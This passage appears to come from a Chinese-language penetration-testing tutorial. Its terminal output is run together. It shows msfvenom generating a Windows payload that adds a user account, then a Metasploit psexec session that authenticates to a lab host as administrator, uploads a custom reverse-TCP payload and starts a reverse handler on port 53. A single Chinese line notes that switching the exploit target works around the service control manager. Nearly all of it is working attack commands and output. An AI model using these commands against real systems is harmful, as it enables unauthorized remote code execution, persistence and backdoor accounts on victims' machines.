root@John:/tmp#msfvenom‐pwindows/adduserPASS=Micropoor$123 USER=Micropoor‐fexe>adduser.exe[‐] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[‐] No arch selected, selecting arch: x86 from the payloadNoencoderorbadcharsspecified,outputtingrawpayloadPayloadsize:279bytesFinalsizeofexefile:73802bytes
同样可以配合target的改变来解决控制管理器的强制命令接收。
攻击机设置:
msfexploit(windows/smb/psexec) >showtargetsExploittargets:IdName‐‐‐‐‐‐0Automatic1PowerShell2Nativeupload3MOFuploadmsfexploit(windows/smb/psexec) >settarget2target =>2msfexploit(windows/smb/psexec) >exploit[*] Started reverse TCP handler on 192.168.1.5:53[*] 192.168.1.119:445 ‐ Connecting to the server...[*] 192.168.1.119:445 ‐ Authenticating to 192.168.1.119:445 as user 'administrator'...[*] 192.168.1.119:445 ‐ Uploading payload... kKwZpPRs.exe[*] 192.168.1.119:445 ‐ Using custom payload /var/www/html/bin_tcp_x86\_53.exe, RHOST and RPORT settings will be ignored![*] 192.168.1.119:445‐CreatedkKwZpPRs.exe...[‐] 192.168.1.119:445 ‐ Unable to remove the service, ERROR_CODE:[‐] 192.168.1.119:445 ‐ Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY[*] Exploit completed, but no session was created.